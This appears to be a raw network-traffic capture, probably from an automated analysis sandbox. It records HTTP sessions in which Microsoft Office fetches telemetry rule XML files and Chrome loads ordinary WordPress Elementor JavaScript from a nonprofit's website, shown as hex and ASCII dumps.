                                                                                                                                                                                                                              113192.168.2.64984613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                              x-ms-request-id: d4a2e493-801e-0048-07d3-20f3fb000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180411Z-r1755647c66sn7s9kfw6gzvyp000000008qg0000000012g5
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              114192.168.2.64984813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                              x-ms-request-id: f94d3c24-301e-001f-4850-23aa3a000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180411Z-17fbfdc98bbvwcxrk0yzwg4d58000000063000000000b2bg
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              115192.168.2.649851141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC758OUTGET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-a169"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ebb8ea4864-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 31 39 5d 2c 7b 39 32 32 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 6f 3d 6e 28 33 32 30 33 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 76 61 72 20 73 3d 6f 28 6e 28 38 31 33 35 29 29 3b 63 6c 61 73 73 20 5f 64 65 66 61
                                                                                                                                                                                                                              Data Ascii: 7dc5/*! elementor - v3.24.0 - 09-10-2024 */"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var o=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=o(n(8135));class _defa
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 74 43 6c 61 73 73 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 64 61 74 61 28 29 2c 6e 3d 74 2e 65 6c 65 6d 65 6e 74 6f 72 49 64 2c 6f 3d 74 2e 65 6c 65 6d 65 6e 74 6f 72 54 79 70 65 2c 73 3d 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 5b 6f 5d 7c 7c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 2e 62 61 73 65 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 73 5b 6e 5d 3d 6e 65 77 20 73 28 7b 24 65 6c 65 6d 65 6e 74 3a 65 2c 69 64 3a 6e 7d 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 39 38 30 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 6f 3d 6e 28 33 32 30 33 29 2c 73 3d 6f 28 6e 28 36 33 39 37 29 29 2c 69 3d 6f 28 6e 28 38 37 30 34 29 29 2c 72 3d 6f 28 6e 28 34 39 38 35 29 29 2c 61 3d 6f 28 6e 28 37 35 33
                                                                                                                                                                                                                              Data Ascii: tClass(e){const t=e.data(),n=t.elementorId,o=t.elementorType,s=this.documentClasses[o]||this.documentClasses.base;this.documents[n]=new s({$element:e,id:n})}}t.default=_default},9804:(e,t,n)=>{var o=n(3203),s=o(n(6397)),i=o(n(8704)),r=o(n(4985)),a=o(n(753
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 5b 22 66 6c 6f 61 74 69 6e 67 2d 62 61 72 73 2d 76 61 72 2d 31 2e 64 65 66 61 75 6c 74 22 5d 3d 28 29 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 6e 2e 62 69 6e 64 28 6e 2c 37 37 31 32 29 29 29 3b 63 6f 6e 73 74 20 61 64 64 45 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 73 65 63 74 69 6f 6e 3d 5b 64 2e 64 65 66 61 75 6c 74 2c 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 2c 6c 2e 64 65 66 61 75 6c 74 2c 63 2e 64 65 66 61 75 6c 74 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 5b 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 5d 2c 65 6c 65 6d 65 6e 74 6f 72 46 72
                                                                                                                                                                                                                              Data Ascii: lementsHandlers["floating-bars-var-1.default"]=()=>Promise.resolve().then(n.bind(n,7712)));const addElementsHandlers=()=>{this.elementsHandlers.section=[d.default,...i.default,l.default,c.default],this.elementsHandlers.container=[...i.default],elementorFr
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 5b 65 5d 3b 72 65 74 75 72 6e 20 69 73 43 6c 61 73 73 48 61 6e 64 6c 65 72 28 74 29 3f 74 3a 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 7b 74 28 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 6e 7d 3d 74 3b 65 28 6e 29 7d 29 29 7d 29 29 7d 2c 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 67 65 74 48 61 6e 64 6c 65 72 73 22 2c 22 33 2e 31 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 67 65 74 48 61 6e 64 6c 65 72 22 29 2c 65 3f
                                                                                                                                                                                                                              Data Ascii: lementsHandlers[e];return isClassHandler(t)?t:new Promise((e=>{t().then((t=>{let{default:n}=t;e(n)}))}))},this.getHandlers=function(e){return elementorDevTools.deprecation.deprecated("getHandlers","3.1.0","elementorFrontend.elementsHandler.getHandler"),e?
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 77 69 6e 64 6f 77 2e 74 6f 70 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 6c 65 67 61 63 79 4d 6f 64 65 2e 65 6c 65 6d 65 6e 74 57 72 61 70 70 65 72 73 22 2c 22 33 2e 31 2e 30 22 29 2c 21 31 7d 7d 2c 74 68 69 73 2e 70 6f 70 75 6c 61 74 65 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 43 6f 6e 66 69 67 28 29 7d 67 65 74 20 4d 6f 64 75 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 70 61 72 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65
                                                                                                                                                                                                                              Data Ascii: ementorFrontend.isEditMode()&&window.top.elementorDevTools.deprecation.deprecated("elementorFrontend.config.legacyMode.elementWrappers","3.1.0"),!1}},this.populateActiveBreakpointsConfig()}get Module(){return this.isEditMode()&&parent.elementorDevTools.de
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6f 64 65 5b 30 5d 2c 22 3a 61 66 74 65 72 22 29 2e 63 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 22 29 7d 67 65 74 44 65 76 69 63 65 53 65 74 74 69 6e 67 28 65 2c 74 2c 6e 29 7b 69 66 28 22 77 69 64 65 73 63 72 65 65 6e 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 74 2c 6e 29 3b 63 6f 6e 73 74 20 6f 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 67 65 74 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 4c 69 73 74 28 7b 6c 61 72 67 65 54 6f 53 6d 61 6c 6c 3a 21 30 2c 77 69 74 68 44 65 73 6b 74 6f 70 3a 21 30 7d 29 3b 6c 65 74 20 73 3d 6f 2e 69 6e 64 65 78 4f 66 28 65 29 3b 66 6f 72 28 3b 73 3e 30 3b 29 7b 63 6f 6e 73
                                                                                                                                                                                                                              Data Ascii: ode[0],":after").content.replace(/"/g,"")}getDeviceSetting(e,t,n){if("widescreen"===e)return this.getWidescreenSetting(t,n);const o=elementorFrontend.breakpoints.getActiveBreakpointsList({largeToSmall:!0,withDesktop:!0});let s=o.indexOf(e);for(;s>0;){cons
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 69 6e 67 73 28 22 73 65 6c 65 63 74 6f 72 73 2e 61 64 6d 69 6e 42 61 72 22 29 29 7d 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 65 2c 74 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 72 2e 64 65 66 61 75 6c 74 29 29 74 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 64 64 43 6c 61 73 73 28 22 65 2d 2d 75 61 2d 22 2b 65 29 7d 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 74 74 72 28 22 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 64 65 76 69 63 65 2d 6d 6f 64 65 22 2c 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 44 65 76 69 63 65 4d 6f 64 65 28 29 29 7d 61 64 64 4c 69 73 74 65 6e 65 72 4f 6e 63 65
                                                                                                                                                                                                                              Data Ascii: ings("selectors.adminBar"))}addUserAgentClasses(){for(const[e,t]of Object.entries(r.default))t&&this.elements.$body.addClass("e--ua-"+e)}setDeviceModeData(){this.elements.$body.attr("data-elementor-device-mode",this.getCurrentDeviceMode())}addListenerOnce
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6c 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 2c 74 68 69 73 2e 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 2c 74 68 69 73 2e 69 6e 69 74 44 69 61 6c 6f 67 73 4d 61 6e 61 67 65 72 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 6d 75 74 65 4d 69 67 72 61 74 69 6f 6e 54 72 61 63 65 73 28 29 2c 70 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2c 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 29 2c 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 2c 74 68 69 73 2e 69 6e 69 74 4f 6e 52 65 61 64 79 45 6c 65 6d 65 6e 74 73 28 29 2c 74 68 69 73 2e 69 6e 69 74
                                                                                                                                                                                                                              Data Ascii: lers={},this.addUserAgentClasses(),this.setDeviceModeData(),this.initDialogsManager(),this.isEditMode()&&this.muteMigrationTraces(),p.default.dispatch(this.elements.$window,"elementor/frontend/init"),this.initModules(),this.initOnReadyElements(),this.init
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6f 6e 2c 73 74 6f 70 4f 6e 4c 61 73 74 53 6c 69 64 65 3a 21 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6c 6f 6f 70 7d 2c 68 61 6e 64 6c 65 45 6c 65 6d 65 6e 74 6f 72 42 72 65 61 6b 70 6f 69 6e 74 73 3a 21 30 2c 6f 6e 3a 7b 73 6c 69 64 65 43 68 61 6e 67 65 3a 28 29 3d 3e 7b 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6b 65 6e 5f 62 75 72 6e 73 26 26 74 68 69 73 2e 68 61 6e 64 6c 65 4b 65 6e 42 75 72 6e 73 28 29 7d 7d 7d 3b 73 77 69 74 63 68 28 22 79 65 73 22 3d 3d 3d 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f 73 6c 69 64 65 73 68 6f 77 5f 6c 6f 6f 70 26 26 28 74 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 3d 74 68 69 73 2e 67 65 74 53 6c 69 64 65 73 43 6f 75 6e 74 28 29 29 2c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 5f
                                                                                                                                                                                                                              Data Ascii: on,stopOnLastSlide:!e.background_slideshow_loop},handleElementorBreakpoints:!0,on:{slideChange:()=>{e.background_slideshow_ken_burns&&this.handleKenBurns()}}};switch("yes"===e.background_slideshow_loop&&(t.loopedSlides=this.getSlidesCount()),e.background_
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 27 22 29 3b 27 7d 29 3b 6e 2e 61 70 70 65 6e 64 28 6f 29 2c 73 2e 61 70 70 65 6e 64 28 6e 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 6c 69 64 65 73 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 6c 69 64 65 73 2e 61 64 64 28 6e 29 7d 29 29 2c 6f 2e 61 70 70 65 6e 64 28 73 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 70 72 65 70 65 6e 64 28 6f 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 61 63 6b 67 72 6f 75 6e 64 53 6c 69 64 65 53 68 6f 77 43 6f 6e 74 61 69 6e 65 72 3d 6f 7d 61 73 79 6e 63 20 69 6e 69 74 53 6c 69 64 65 72 28 29 7b 69 66 28 31 3e 3d 74 68 69 73 2e 67 65 74 53 6c 69 64 65 73 43 6f 75 6e 74 28 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28
                                                                                                                                                                                                                              Data Ascii: '");'});n.append(o),s.append(n),this.elements.$slides=this.elements.$slides.add(n)})),o.append(s),this.$element.prepend(o),this.elements.$backgroundSlideShowContainer=o}async initSlider(){if(1>=this.getSlidesCount())return;const e=this.getElementSettings(


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              116192.168.2.649852141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC777OUTGET /wp-content/uploads/hummingbird-assets/6419b4d897e8dc5284378e8acb00aa04.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-280d"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ec79e42cda-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 32 38 30 64 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 65 63 73 70 72 6f 2a 2a 2f 0d 0a 76 61 72 20 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 53 6c 69 64 65 72 3d 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f 6e 74 65 6e 64 2e 68 61 6e 64 6c 65 72 73 2e 42 61 73 65 2e 65 78 74 65 6e 64 28 7b 67 65 74 53 6b 69 6e 50 72 65 66 69 78 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 22 63 75 73 74 6f 6d 5f 22 7d 2c 67 65 74 44 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 7b 73 65 6c 65 63 74 6f 72 73 3a 7b 63 61 72 6f 75 73 65 6c 3a 22 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 22 2c 73 6c 69 64 65 43 6f 6e 74 65 6e 74 3a 22 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 22 7d 7d 7d 2c
                                                                                                                                                                                                                              Data Ascii: 280d/**handles:ecspro**/var EleCustomSkinSlider=elementorModules.frontend.handlers.Base.extend({getSkinPrefix:function e(){return"custom_"},getDefaultSettings:function e(){return{selectors:{carousel:".swiper-container",slideContent:".swiper-slide"}}},
